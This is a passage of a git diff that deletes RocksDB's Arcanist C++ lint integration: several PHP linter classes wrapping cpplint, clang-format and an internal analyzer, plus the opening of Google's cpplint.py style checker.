- "Also don't forget to chmod a+x cpplint.py!"); - } - - return $bin; - } - - public function lintPath($path) { - $bin = $this->getLintPath(); - $path = $this->rocksdbDir().'/'.$path; - - $f = new ExecFuture("%C $path", $bin); - - list($err, $stdout, $stderr) = $f->resolve(); - - if ($err === 2) { - throw new Exception("cpplint failed to run correctly:\n".$stderr); - } - - $lines = explode("\n", $stderr); - $messages = array(); - foreach ($lines as $line) { - $line = trim($line); - $matches = null; - $regex = '/^[^:]+:(\d+):\s*(.*)\s*\[(.*)\] \[(\d+)\]$/'; - if (!preg_match($regex, $line, $matches)) { - continue; - } - foreach ($matches as $key => $match) { - $matches[$key] = trim($match); - } - $message = new ArcanistLintMessage(); - $message->setPath($path); - $message->setLine($matches[1]); - $message->setCode($matches[3]); - $message->setName($matches[3]); - $message->setDescription($matches[2]); - $message->setSeverity(ArcanistLintSeverity::SEVERITY_WARNING); - $this->addLintMessage($message); - } - } - - // The path of this linter - private function linterDir() { - return dirname(__FILE__); - } - - // TODO(kaili) a quick and dirty way to figure out rocksdb's root dir. - private function rocksdbDir() { - return $this->linterDir()."/../.."; - } -} diff --git a/arcanist_util/cpp_linter/BaseDirectoryScopedFormatLinter.php b/arcanist_util/cpp_linter/BaseDirectoryScopedFormatLinter.php deleted file mode 100644 index 4a7b307dc8a..00000000000 --- a/arcanist_util/cpp_linter/BaseDirectoryScopedFormatLinter.php +++ /dev/null @@ -1,74 +0,0 @@ -getPathsToLint() as $p) { - // check if $path starts with $p - if (strncmp($path, $p, strlen($p)) === 0) { - return true; - } - } - return false; - } - - // API to tell this linter which lines were changed - final public function setPathChangedLines($path, $changed) { - $this->changedLines[$path] = $changed; - } - - final public function willLintPaths(array $paths) { - $futures = array(); - foreach ($paths as $path) { - if (!$this->shouldLintPath($path)) { - continue; - } - - $changed = $this->changedLines[$path]; - if (!isset($changed)) { - // do not run linter if there are no changes - continue; - } - - $futures[$path] = $this->getFormatFuture($path, $changed); - } - - foreach (id(new FutureIterator($futures))->limit(8) as $p => $f) { - $this->rawLintOutput[$p] = $f->resolvex(); - } - } - - abstract protected function getFormatFuture($path, array $changed); - abstract protected function getLintMessage($diff); - - final public function lintPath($path) { - if (!isset($this->rawLintOutput[$path])) { - return; - } - - list($new_content) = $this->rawLintOutput[$path]; - $old_content = $this->getData($path); - - if ($new_content != $old_content) { - $diff = ArcanistDiffUtils::renderDifferences($old_content, $new_content); - $this->raiseLintAtOffset( - 0, - self::LINT_FORMATTING, - $this->getLintMessage($diff), - $old_content, - $new_content); - } - } - -} diff --git a/arcanist_util/cpp_linter/FacebookHowtoevenLinter.php b/arcanist_util/cpp_linter/FacebookHowtoevenLinter.php deleted file mode 100644 index 6edb114b669..00000000000 --- a/arcanist_util/cpp_linter/FacebookHowtoevenLinter.php +++ /dev/null @@ -1,223 +0,0 @@ -localExecx("rm -rf _build/_lint"); - - // Build compilation database. - $lintable_paths = $this->getLintablePaths($paths); - $interesting_paths = $this->getInterestingPaths($lintable_paths); - - if (!$lintable_paths) { - return; - } - - // Run lint. 
- try { - $this->localExecx( - "%C %C -p _build/dev/ %Ls", - $this->getBinaryPath(), - $this->getFilteredIssues(), - $lintable_paths); - } catch (CommandException $exception) { - PhutilConsole::getConsole()->writeErr($exception->getMessage()); - } - - // Load results. - $result = id( - new SQLite3( - $this->getProjectRoot().'/_build/_lint/lint.db', - SQLITE3_OPEN_READONLY)) - ->query("SELECT * FROM raised_issues"); - - while ($issue = $result->fetchArray(SQLITE3_ASSOC)) { - // Skip issues not part of the linted file. - if (in_array($issue['file'], $interesting_paths)) { - $this->addLintMessage(id(new ArcanistLintMessage()) - ->setPath($issue['file']) - ->setLine($issue['line']) - ->setChar($issue['column']) - ->setCode('Howtoeven') - ->setSeverity($this->getSeverity($issue['severity'])) - ->setName('Hte-'.$issue['name']) - ->setDescription( - sprintf( - "%s\n\n%s", - ($issue['message']) ? $issue['message'] : $issue['description'], - $issue['explanation'])) - ->setOriginalText(idx($issue, 'original', '')) - ->setReplacementText(idx($issue, 'replacement', ''))); - } - } - } - - public function lintPath($path) { - } - - /** - * Get the paths that we know how to lint. - * - * The strategy is to first look whether there's an existing compilation - * database and use that if it's exhaustive. We generate our own only if - * necessary. - */ - private function getLintablePaths($paths) { - // Replace headers with existing sources. - for ($i = 0; $i < count($paths); $i++) { - if (preg_match("/\.h$/", $paths[$i])) { - $header = preg_replace("/\.h$/", ".cpp", $paths[$i]); - if (file_exists($header)) { - $paths[$i] = $header; - } - } - } - - // Check if database exists and is exhaustive. - $available_paths = $this->getAvailablePaths(); - $lintable_paths = array_intersect($paths, $available_paths); - if ($paths === $lintable_paths) { - return $lintable_paths; - } - - // Generate our own database. - $targets = $this->getTargetsFor($paths); - if (!$targets) { - PhutilConsole::getConsole()->writeErr( - "No build targets found for %s\n", - implode(', ', $paths)); - return array(); - } - - $this->localExecx("./tools/build/bin/fbconfig.par -r %Ls", $targets); - $this->localExecx("./tools/build/bin/fbmake.par gen_cdb"); - - $available_paths = $this->getAvailablePaths(); - $lintable_paths = array_intersect($paths, $available_paths); - if ($paths != $lintable_paths) { - PhutilConsole::getConsole()->writeErr( - "Can't lint %s\n", - implode(', ', array_diff($paths, $available_paths))); - } - - // Return what we know how to lint. - return $lintable_paths; - } - - /** - * Get the available paths in the current compilation database. - */ - private function getAvailablePaths() { - $database_path = $this->getProjectRoot() - .'/_build/dev/compile_commands.json'; - if (!file_exists($database_path)) { - return array(); - } - - $entries = json_decode(file_get_contents($database_path), true); - $paths = array(); - foreach ($entries as $entry) { - $paths[] = $entry['file']; - } - return $paths; - } - - /** - * Search for the targets directories for the given files. - */ - private static function getTargetsFor($paths) { - $targets = array(); - foreach ($paths as $path) { - while (($path = dirname($path)) !== '.') { - if (in_array('TARGETS', scandir($path))) { - $contents = file_get_contents($path.'/TARGETS'); - if (strpos($contents, 'cpp_binary') !== false) { - $targets[] = $path; - break; - } - } - } - } - return array_unique($targets); - } - - /** - * The paths that we actually want to report on. 
- */ - private function getInterestingPaths($paths) { - $headers = array(); - foreach ($paths as $path) { - $headers[] = preg_replace("/\.cpp$/", ".h", $path); - } - return array_merge($paths, $headers); - } - - /** - * The path where the binary is located. Will return the current dewey binary - * unless the `HOWTOEVEN_BUILD` environment variable is set. - */ - private function getBinaryPath() { - $path = sprintf( - "/mnt/dewey/fbcode/.commits/%s/builds/howtoeven/client", - self::VERSION); - - $build = getenv('HOWTOEVEN_BUILD'); - if ($build) { - $path = sprintf( - "./_build/%s/tools/howtoeven/client", - $build); - if (!file_exists($path)) { - PhutilConsole::getConsole()->writeErr(">> %s does not exist\n", $path); - exit(1); - } - } - - return $path; - } - - /** - * Execute the command in the root directory. - */ - private function localExecx($command /* , ... */) { - $arguments = func_get_args(); - return newv('ExecFuture', $arguments) - ->setCWD($this->getProjectRoot()) - ->resolvex(); - } - - /** - * The root of the project. - */ - private function getProjectRoot() { - return $this->getEngine()->getWorkingCopy()->getProjectRoot(); - } - - private function getFilteredIssues() { - $issues = getenv('HOWTOEVEN_ISSUES'); - return ($issues) ? csprintf('-issues %s', $issues) : ''; - } - -} diff --git a/arcanist_util/cpp_linter/FbcodeClangFormatLinter.php b/arcanist_util/cpp_linter/FbcodeClangFormatLinter.php deleted file mode 100644 index a94a0bed15e..00000000000 --- a/arcanist_util/cpp_linter/FbcodeClangFormatLinter.php +++ /dev/null @@ -1,58 +0,0 @@ - ArcanistLintSeverity::SEVERITY_ADVICE, - ); - } - - public function getLintNameMap() { - return array( - self::LINT_FORMATTING => pht('Changes are not clang-formatted'), - ); - } - - protected function getFormatFuture($path, array $changed) { - $args = ""; - foreach ($changed as $key => $value) { - $args .= " --lines=$key:$key"; - } - - $binary = self::CLANG_FORMAT_BINARY; - if (!file_exists($binary)) { - // trust the $PATH - $binary = "clang-format"; - } - - return new ExecFuture( - "%s %s $args", - $binary, - $this->getEngine()->getFilePathOnDisk($path)); - } - - protected function getLintMessage($diff) { - $link_to_clang_format = - "[[ http://fburl.com/clang-format | clang-format ]]"; - return <<getEngine()->getFilePathOnDisk($p); - $lpath_file = file($lpath); - if (preg_match('/\.(c)$/', $lpath) || - preg_match('/-\*-.*Mode: C[; ].*-\*-/', $lpath_file[0]) || - preg_match('/vim(:.*)*:\s*(set\s+)?filetype=c\s*:/', $lpath_file[0]) - ) { - $futures[$p] = new ExecFuture("%s %s %s 2>&1", - self::FLINT, self::C_FLAG, - $this->getEngine()->getFilePathOnDisk($p)); - } else { - $futures[$p] = new ExecFuture("%s %s 2>&1", - self::FLINT, $this->getEngine()->getFilePathOnDisk($p)); - } - } - - foreach (Futures($futures)->limit(8) as $p => $f) { - $this->rawLintOutput[$p] = $f->resolvex(); - } - - return; - } - - public function getLinterName() { - return "FBCPP"; - } - - public function lintPath($path) { - $this->runCppLint($path); - } - - private function runCppLint($path) { - $msgs = $this->getCppLintOutput($path); - foreach ($msgs as $m) { - $this->raiseLintAtLine($m['line'], 0, $m['severity'], $m['msg']); - } - } - - private function adviseOnEachPattern( - $path, - $regex, - $message, - $lint_type = self::LINT_ADVICE, - $match_idx = 0) { - $file_data = $this->getData($path); - $matches = array(); - if (!preg_match_all($regex, $file_data, $matches, PREG_OFFSET_CAPTURE)) { - return; - } - - foreach ($matches[$match_idx] as $match) { - list($match_str, 
$offset) = $match; - $this->raiseLintAtOffset($offset, $lint_type, $message, $match_str); - } - } - - public function getLintSeverityMap() { - return array( - self::LINT_WARNING => ArcanistLintSeverity::SEVERITY_WARNING, - self::LINT_ADVICE => ArcanistLintSeverity::SEVERITY_ADVICE, - self::LINT_ERROR => ArcanistLintSeverity::SEVERITY_ERROR - ); - } - - public function getLintNameMap() { - return array( - self::LINT_ADVICE => "CppLint Advice", - self::LINT_WARNING => "CppLint Warning", - self::LINT_ERROR => "CppLint Error" - ); - } - - private function getCppLintOutput($path) { - if (!array_key_exists($path, $this->rawLintOutput)) { - return array(); - } - list($output) = $this->rawLintOutput[$path]; - - $msgs = array(); - $current = null; - $matches = array(); - foreach (explode("\n", $output) as $line) { - if (preg_match('/.*?:(\d+):(.*)/', $line, $matches)) { - if ($current) { - $msgs[] = $current; - } - $line = $matches[1]; - $text = $matches[2]; - if (preg_match('/.*Warning.*/', $text)) { - $sev = self::LINT_WARNING; - } else if (preg_match('/.*Advice.*/', $text)) { - $sev = self::LINT_ADVICE; - } else { - $sev = self::LINT_ERROR; - } - $current = array('line' => $line, - 'msg' => $text, - 'severity' => $sev); - } else if ($current) { - $current['msg'] .= ' ' . $line; - } - } - if ($current) { - $msgs[] = $current; - } - - return $msgs; - } -} diff --git a/arcanist_util/cpp_linter/cpplint.py b/arcanist_util/cpp_linter/cpplint.py deleted file mode 100755 index 3d0c45a6dd0..00000000000 --- a/arcanist_util/cpp_linter/cpplint.py +++ /dev/null @@ -1,4767 +0,0 @@ -#!/usr/bin/python -# Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -# This source code is licensed under the BSD-style license found in the -# LICENSE file in the root directory of this source tree. An additional grant -# of patent rights can be found in the PATENTS file in the same directory. -# Copyright (c) 2011 The LevelDB Authors. All rights reserved. -# Use of this source code is governed by a BSD-style license that can be -# found in the LICENSE file. See the AUTHORS file for names of contributors. -# -# Copyright (c) 2009 Google Inc. All rights reserved. -# -# Redistribution and use in source and binary forms, with or without -# modification, are permitted provided that the following conditions are -# met: -# * Redistributions of source code must retain the above copyright -# notice, this list of conditions and the following disclaimer. -# * Redistributions in binary form must reproduce the above -# copyright notice, this list of conditions and the following disclaimer -# in the documentation and/or other materials provided with the -# distribution. -# * Neither the name of Google Inc. nor the names of its -# contributors may be used to endorse or promote products derived from -# this software without specific prior written permission. -# -# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS -# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT -# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR -# A PARTICULAR PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT -# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, -# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT -# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, -# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT -# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE -# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - -"""Does google-lint on c++ files. - -The goal of this script is to identify places in the code that *may* -be in non-compliance with google style. It does not attempt to fix -up these problems -- the point is to educate. It does also not -attempt to find all problems, or to ensure that everything it does -find is legitimately a problem. - -In particular, we can get very confused by /* and // inside strings! -We do a small hack, which is to ignore //'s with "'s after them on the -same line, but it is far from perfect (in either direction). -""" - -import codecs -import copy -import getopt -import math # for log -import os -import re -import sre_compile -import string -import sys -import unicodedata - - -_USAGE = """ -Syntax: cpplint.py [--verbose=#] [--output=vs7] [--filter=-x,+y,...] - [--counting=total|toplevel|detailed] [--root=subdir] - [--linelength=digits] - [file] ... - - The style guidelines this tries to follow are those in - http://google-styleguide.googlecode.com/svn/trunk/cppguide.xml - - Every problem is given a confidence score from 1-5, with 5 meaning we are - certain of the problem, and 1 meaning it could be a legitimate construct. - This will miss some errors, and is not a substitute for a code review. - - To suppress false-positive errors of a certain category, add a - 'NOLINT(category)' comment to the line. NOLINT or NOLINT(*) - suppresses errors of all categories on that line. - - The files passed in will be linted; at least one file must be provided. - Default linted extensions are .cc, .cpp, .cu, .cuh and .h. Change the - extensions with the --extensions flag. - - Flags: - - output=vs7 - By default, the output is formatted to ease emacs parsing. Visual Studio - compatible output (vs7) may also be used. Other formats are unsupported. - - verbose=# - Specify a number 0-5 to restrict errors to certain verbosity levels. - - filter=-x,+y,... - Specify a comma-separated list of category-filters to apply: only - error messages whose category names pass the filters will be printed. - (Category names are printed with the message and look like - "[whitespace/indent]".) Filters are evaluated left to right. - "-FOO" and "FOO" means "do not print categories that start with FOO". - "+FOO" means "do print categories that start with FOO". - - Examples: --filter=-whitespace,+whitespace/braces - --filter=whitespace,runtime/printf,+runtime/printf_format - --filter=-,+build/include_what_you_use - - To see a list of all the categories used in cpplint, pass no arg: - --filter= - - counting=total|toplevel|detailed - The total number of errors found is always printed. If - 'toplevel' is provided, then the count of errors in each of - the top-level categories like 'build' and 'whitespace' will - also be printed. If 'detailed' is provided, then a count - is provided for each category like 'build/class'. - - root=subdir - The root directory used for deriving header guard CPP variable. 
- By default, the header guard CPP variable is calculated as the relative - path to the directory that contains .git, .hg, or .svn. When this flag - is specified, the relative path is calculated from the specified - directory. If the specified directory does not exist, this flag is - ignored. - - Examples: - Assuing that src/.git exists, the header guard CPP variables for - src/chrome/browser/ui/browser.h are: - - No flag => CHROME_BROWSER_UI_BROWSER_H_ - --root=chrome => BROWSER_UI_BROWSER_H_ - --root=chrome/browser => UI_BROWSER_H_ - - linelength=digits - This is the allowed line length for the project. The default value is - 80 characters. - - Examples: - --linelength=120 - - extensions=extension,extension,... - The allowed file extensions that cpplint will check - - Examples: - --extensions=hpp,cpp -""" - -# We categorize each error message we print. Here are the categories. -# We want an explicit list so we can list them all in cpplint --filter=. -# If you add a new error message with a new category, add it to the list -# here! cpplint_unittest.py should tell you if you forget to do this. -_ERROR_CATEGORIES = [ - 'build/class', - 'build/deprecated', - 'build/endif_comment', - 'build/explicit_make_pair', - 'build/forward_decl', - 'build/header_guard', - 'build/include', - 'build/include_alpha', - 'build/include_order', - 'build/include_what_you_use', - 'build/namespaces', - 'build/printf_format', - 'build/storage_class', - 'legal/copyright', - 'readability/alt_tokens', - 'readability/braces', - 'readability/casting', - 'readability/check', - 'readability/constructors', - 'readability/fn_size', - 'readability/function', - 'readability/multiline_comment', - 'readability/multiline_string', - 'readability/namespace', - 'readability/nolint', - 'readability/nul', - 'readability/streams', - 'readability/todo', - 'readability/utf8', - 'runtime/arrays', - 'runtime/casting', - 'runtime/explicit', - 'runtime/int', - 'runtime/init', - 'runtime/invalid_increment', - 'runtime/member_string_references', - 'runtime/memset', - 'runtime/operator', - 'runtime/printf', - 'runtime/printf_format', - 'runtime/references', - 'runtime/string', - 'runtime/threadsafe_fn', - 'runtime/vlog', - 'whitespace/blank_line', - 'whitespace/braces', - 'whitespace/comma', - 'whitespace/comments', - 'whitespace/empty_conditional_body', - 'whitespace/empty_loop_body', - 'whitespace/end_of_line', - 'whitespace/ending_newline', - 'whitespace/forcolon', - 'whitespace/indent', - 'whitespace/line_length', - 'whitespace/newline', - 'whitespace/operators', - 'whitespace/parens', - 'whitespace/semicolon', - 'whitespace/tab', - 'whitespace/todo' - ] - -# The default state of the category filter. This is overrided by the --filter= -# flag. By default all errors are on, so only add here categories that should be -# off by default (i.e., categories that must be enabled by the --filter= flags). -# All entries here should start with a '-' or '+', as in the --filter= flag. -_DEFAULT_FILTERS = [] - -# We used to check for high-bit characters, but after much discussion we -# decided those were OK, as long as they were in UTF-8 and didn't represent -# hard-coded international strings, which belong in a separate i18n file. 
- - -# C++ headers -_CPP_HEADERS = frozenset([ - # Legacy - 'algobase.h', - 'algo.h', - 'alloc.h', - 'builtinbuf.h', - 'bvector.h', - 'complex.h', - 'defalloc.h', - 'deque.h', - 'editbuf.h', - 'fstream.h', - 'function.h', - 'hash_map', - 'hash_map.h', - 'hash_set', - 'hash_set.h', - 'hashtable.h', - 'heap.h', - 'indstream.h', - 'iomanip.h', - 'iostream.h', - 'istream.h', - 'iterator.h', - 'list.h', - 'map.h', - 'multimap.h', - 'multiset.h', - 'ostream.h', - 'pair.h', - 'parsestream.h', - 'pfstream.h', - 'procbuf.h', - 'pthread_alloc', - 'pthread_alloc.h', - 'rope', - 'rope.h', - 'ropeimpl.h', - 'set.h', - 'slist', - 'slist.h', - 'stack.h', - 'stdiostream.h', - 'stl_alloc.h', - 'stl_relops.h', - 'streambuf.h', - 'stream.h', - 'strfile.h', - 'strstream.h', - 'tempbuf.h', - 'tree.h', - 'type_traits.h', - 'vector.h', - # 17.6.1.2 C++ library headers - 'algorithm', - 'array', - 'atomic', - 'bitset', - 'chrono', - 'codecvt', - 'complex', - 'condition_variable', - 'deque', - 'exception', - 'forward_list', - 'fstream', - 'functional', - 'future', - 'initializer_list', - 'iomanip', - 'ios', - 'iosfwd', - 'iostream', - 'istream', - 'iterator', - 'limits', - 'list', - 'locale', - 'map', - 'memory', - 'mutex', - 'new', - 'numeric', - 'ostream', - 'queue', - 'random', - 'ratio', - 'regex', - 'set', - 'sstream', - 'stack', - 'stdexcept', - 'streambuf', - 'string', - 'strstream', - 'system_error', - 'thread', - 'tuple', - 'typeindex', - 'typeinfo', - 'type_traits', - 'unordered_map', - 'unordered_set', - 'utility', - 'valarray', - 'vector', - # 17.6.1.2 C++ headers for C library facilities - 'cassert', - 'ccomplex', - 'cctype', - 'cerrno', - 'cfenv', - 'cfloat', - 'cinttypes', - 'ciso646', - 'climits', - 'clocale', - 'cmath', - 'csetjmp', - 'csignal', - 'cstdalign', - 'cstdarg', - 'cstdbool', - 'cstddef', - 'cstdint', - 'cstdio', - 'cstdlib', - 'cstring', - 'ctgmath', - 'ctime', - 'cuchar', - 'cwchar', - 'cwctype', - ]) - -# Assertion macros. These are defined in base/logging.h and -# testing/base/gunit.h. Note that the _M versions need to come first -# for substring matching to work. -_CHECK_MACROS = [ - 'DCHECK', 'CHECK', - 'EXPECT_TRUE_M', 'EXPECT_TRUE', - 'ASSERT_TRUE_M', 'ASSERT_TRUE', - 'EXPECT_FALSE_M', 'EXPECT_FALSE', - 'ASSERT_FALSE_M', 'ASSERT_FALSE', - ] - -# Replacement macros for CHECK/DCHECK/EXPECT_TRUE/EXPECT_FALSE -_CHECK_REPLACEMENT = dict([(m, {}) for m in _CHECK_MACROS]) - -for op, replacement in [('==', 'EQ'), ('!=', 'NE'), - ('>=', 'GE'), ('>', 'GT'), - ('<=', 'LE'), ('<', 'LT')]: - _CHECK_REPLACEMENT['DCHECK'][op] = 'DCHECK_%s' % replacement - _CHECK_REPLACEMENT['CHECK'][op] = 'CHECK_%s' % replacement - _CHECK_REPLACEMENT['EXPECT_TRUE'][op] = 'EXPECT_%s' % replacement - _CHECK_REPLACEMENT['ASSERT_TRUE'][op] = 'ASSERT_%s' % replacement - _CHECK_REPLACEMENT['EXPECT_TRUE_M'][op] = 'EXPECT_%s_M' % replacement - _CHECK_REPLACEMENT['ASSERT_TRUE_M'][op] = 'ASSERT_%s_M' % replacement - -for op, inv_replacement in [('==', 'NE'), ('!=', 'EQ'), - ('>=', 'LT'), ('>', 'LE'), - ('<=', 'GT'), ('<', 'GE')]: - _CHECK_REPLACEMENT['EXPECT_FALSE'][op] = 'EXPECT_%s' % inv_replacement - _CHECK_REPLACEMENT['ASSERT_FALSE'][op] = 'ASSERT_%s' % inv_replacement - _CHECK_REPLACEMENT['EXPECT_FALSE_M'][op] = 'EXPECT_%s_M' % inv_replacement - _CHECK_REPLACEMENT['ASSERT_FALSE_M'][op] = 'ASSERT_%s_M' % inv_replacement - -# Alternative tokens and their replacements. For full list, see section 2.5 -# Alternative tokens [lex.digraph] in the C++ standard. 
-# -# Digraphs (such as '%:') are not included here since it's a mess to -# match those on a word boundary. -_ALT_TOKEN_REPLACEMENT = { - 'and': '&&', - 'bitor': '|', - 'or': '||', - 'xor': '^', - 'compl': '~', - 'bitand': '&', - 'and_eq': '&=', - 'or_eq': '|=', - 'xor_eq': '^=', - 'not': '!', - 'not_eq': '!=' - } - -# Compile regular expression that matches all the above keywords. The "[ =()]" -# bit is meant to avoid matching these keywords outside of boolean expressions. -# -# False positives include C-style multi-line comments and multi-line strings -# but those have always been troublesome for cpplint. -_ALT_TOKEN_REPLACEMENT_PATTERN = re.compile( - r'[ =()](' + ('|'.join(_ALT_TOKEN_REPLACEMENT.keys())) + r')(?=[ (]|$)') - - -# These constants define types of headers for use with -# _IncludeState.CheckNextIncludeOrder(). -_C_SYS_HEADER = 1 -_CPP_SYS_HEADER = 2 -_LIKELY_MY_HEADER = 3 -_POSSIBLE_MY_HEADER = 4 -_OTHER_HEADER = 5 - -# These constants define the current inline assembly state -_NO_ASM = 0 # Outside of inline assembly block -_INSIDE_ASM = 1 # Inside inline assembly block -_END_ASM = 2 # Last line of inline assembly block -_BLOCK_ASM = 3 # The whole block is an inline assembly block - -# Match start of assembly blocks -_MATCH_ASM = re.compile(r'^\s*(?:asm|_asm|__asm|__asm__)' - r'(?:\s+(volatile|__volatile__))?' - r'\s*[{(]') - - -_regexp_compile_cache = {} - -# Finds occurrences of NOLINT or NOLINT(...). -_RE_SUPPRESSION = re.compile(r'\bNOLINT\b(\([^)]*\))?') - -# {str, set(int)}: a map from error categories to sets of linenumbers -# on which those errors are expected and should be suppressed. -_error_suppressions = {} - -# The root directory used for deriving header guard CPP variable. -# This is set by --root flag. -_root = None - -# The allowed line length of files. -# This is set by --linelength flag. -_line_length = 80 - -# The allowed extensions for file names -# This is set by --extensions flag. -_valid_extensions = set(['cc', 'h', 'cpp', 'cu', 'cuh']) - -def ParseNolintSuppressions(filename, raw_line, linenum, error): - """Updates the global list of error-suppressions. - - Parses any NOLINT comments on the current line, updating the global - error_suppressions store. Reports an error if the NOLINT comment - was malformed. - - Args: - filename: str, the name of the input file. - raw_line: str, the line of input text, with comments. - linenum: int, the number of the current line. - error: function, an error handler. - """ - # FIXME(adonovan): "NOLINT(" is misparsed as NOLINT(*). - matched = _RE_SUPPRESSION.search(raw_line) - if matched: - category = matched.group(1) - if category in (None, '(*)'): # => "suppress all" - _error_suppressions.setdefault(None, set()).add(linenum) - else: - if category.startswith('(') and category.endswith(')'): - category = category[1:-1] - if category in _ERROR_CATEGORIES: - _error_suppressions.setdefault(category, set()).add(linenum) - else: - error(filename, linenum, 'readability/nolint', 5, - 'Unknown NOLINT error category: %s' % category) - - -def ResetNolintSuppressions(): - "Resets the set of NOLINT suppressions to empty." - _error_suppressions.clear() - - -def IsErrorSuppressedByNolint(category, linenum): - """Returns true if the specified error category is suppressed on this line. - - Consults the global error_suppressions map populated by - ParseNolintSuppressions/ResetNolintSuppressions. - - Args: - category: str, the category of the error. - linenum: int, the current line number. 
- Returns: - bool, True iff the error should be suppressed due to a NOLINT comment. - """ - return (linenum in _error_suppressions.get(category, set()) or - linenum in _error_suppressions.get(None, set())) - -def Match(pattern, s): - """Matches the string with the pattern, caching the compiled regexp.""" - # The regexp compilation caching is inlined in both Match and Search for - # performance reasons; factoring it out into a separate function turns out - # to be noticeably expensive. - if pattern not in _regexp_compile_cache: - _regexp_compile_cache[pattern] = sre_compile.compile(pattern) - return _regexp_compile_cache[pattern].match(s) - - -def ReplaceAll(pattern, rep, s): - """Replaces instances of pattern in a string with a replacement. - - The compiled regex is kept in a cache shared by Match and Search. - - Args: - pattern: regex pattern - rep: replacement text - s: search string - - Returns: - string with replacements made (or original string if no replacements) - """ - if pattern not in _regexp_compile_cache: - _regexp_compile_cache[pattern] = sre_compile.compile(pattern) - return _regexp_compile_cache[pattern].sub(rep, s) - - -def Search(pattern, s): - """Searches the string for the pattern, caching the compiled regexp.""" - if pattern not in _regexp_compile_cache: - _regexp_compile_cache[pattern] = sre_compile.compile(pattern) - return _regexp_compile_cache[pattern].search(s) - - -class _IncludeState(dict): - """Tracks line numbers for includes, and the order in which includes appear. - - As a dict, an _IncludeState object serves as a mapping between include - filename and line number on which that file was included. - - Call CheckNextIncludeOrder() once for each header in the file, passing - in the type constants defined above. Calls in an illegal order will - raise an _IncludeError with an appropriate error message. - - """ - # self._section will move monotonically through this set. If it ever - # needs to move backwards, CheckNextIncludeOrder will raise an error. - _INITIAL_SECTION = 0 - _MY_H_SECTION = 1 - _C_SECTION = 2 - _CPP_SECTION = 3 - _OTHER_H_SECTION = 4 - - _TYPE_NAMES = { - _C_SYS_HEADER: 'C system header', - _CPP_SYS_HEADER: 'C++ system header', - _LIKELY_MY_HEADER: 'header this file implements', - _POSSIBLE_MY_HEADER: 'header this file may implement', - _OTHER_HEADER: 'other header', - } - _SECTION_NAMES = { - _INITIAL_SECTION: "... nothing. (This can't be an error.)", - _MY_H_SECTION: 'a header this file implements', - _C_SECTION: 'C system header', - _CPP_SECTION: 'C++ system header', - _OTHER_H_SECTION: 'other header', - } - - def __init__(self): - dict.__init__(self) - self.ResetSection() - - def ResetSection(self): - # The name of the current section. - self._section = self._INITIAL_SECTION - # The path of last found header. - self._last_header = '' - - def SetLastHeader(self, header_path): - self._last_header = header_path - - def CanonicalizeAlphabeticalOrder(self, header_path): - """Returns a path canonicalized for alphabetical comparison. - - - replaces "-" with "_" so they both cmp the same. - - removes '-inl' since we don't require them to be after the main header. - - lowercase everything, just in case. - - Args: - header_path: Path to be canonicalized. - - Returns: - Canonicalized path. - """ - return header_path.replace('-inl.h', '.h').replace('-', '_').lower() - - def IsInAlphabeticalOrder(self, clean_lines, linenum, header_path): - """Check if a header is in alphabetical order with the previous header. 
- - Args: - clean_lines: A CleansedLines instance containing the file. - linenum: The number of the line to check. - header_path: Canonicalized header to be checked. - - Returns: - Returns true if the header is in alphabetical order. - """ - # If previous section is different from current section, _last_header will - # be reset to empty string, so it's always less than current header. - # - # If previous line was a blank line, assume that the headers are - # intentionally sorted the way they are. - if (self._last_header > header_path and - not Match(r'^\s*$', clean_lines.elided[linenum - 1])): - return False - return True - - def CheckNextIncludeOrder(self, header_type): - """Returns a non-empty error message if the next header is out of order. - - This function also updates the internal state to be ready to check - the next include. - - Args: - header_type: One of the _XXX_HEADER constants defined above. - - Returns: - The empty string if the header is in the right order, or an - error message describing what's wrong. - - """ - error_message = ('Found %s after %s' % - (self._TYPE_NAMES[header_type], - self._SECTION_NAMES[self._section])) - - last_section = self._section - - if header_type == _C_SYS_HEADER: - if self._section <= self._C_SECTION: - self._section = self._C_SECTION - else: - self._last_header = '' - return error_message - elif header_type == _CPP_SYS_HEADER: - if self._section <= self._CPP_SECTION: - self._section = self._CPP_SECTION - else: - self._last_header = '' - return error_message - elif header_type == _LIKELY_MY_HEADER: - if self._section <= self._MY_H_SECTION: - self._section = self._MY_H_SECTION - else: - self._section = self._OTHER_H_SECTION - elif header_type == _POSSIBLE_MY_HEADER: - if self._section <= self._MY_H_SECTION: - self._section = self._MY_H_SECTION - else: - # This will always be the fallback because we're not sure - # enough that the header is associated with this file. - self._section = self._OTHER_H_SECTION - else: - assert header_type == _OTHER_HEADER - self._section = self._OTHER_H_SECTION - - if last_section != self._section: - self._last_header = '' - - return '' - - -class _CppLintState(object): - """Maintains module-wide state..""" - - def __init__(self): - self.verbose_level = 1 # global setting. - self.error_count = 0 # global count of reported errors - # filters to apply when emitting error messages - self.filters = _DEFAULT_FILTERS[:] - self.counting = 'total' # In what way are we counting errors? - self.errors_by_category = {} # string to int dict storing error counts - - # output format: - # "emacs" - format that emacs can parse (default) - # "vs7" - format that Microsoft Visual Studio 7 can parse - self.output_format = 'emacs' - - def SetOutputFormat(self, output_format): - """Sets the output format for errors.""" - self.output_format = output_format - - def SetVerboseLevel(self, level): - """Sets the module's verbosity, and returns the previous setting.""" - last_verbose_level = self.verbose_level - self.verbose_level = level - return last_verbose_level - - def SetCountingStyle(self, counting_style): - """Sets the module's counting options.""" - self.counting = counting_style - - def SetFilters(self, filters): - """Sets the error-message filters. - - These filters are applied when deciding whether to emit a given - error message. - - Args: - filters: A string of comma-separated filters (eg "+whitespace/indent"). - Each filter should start with + or -; else we die. 
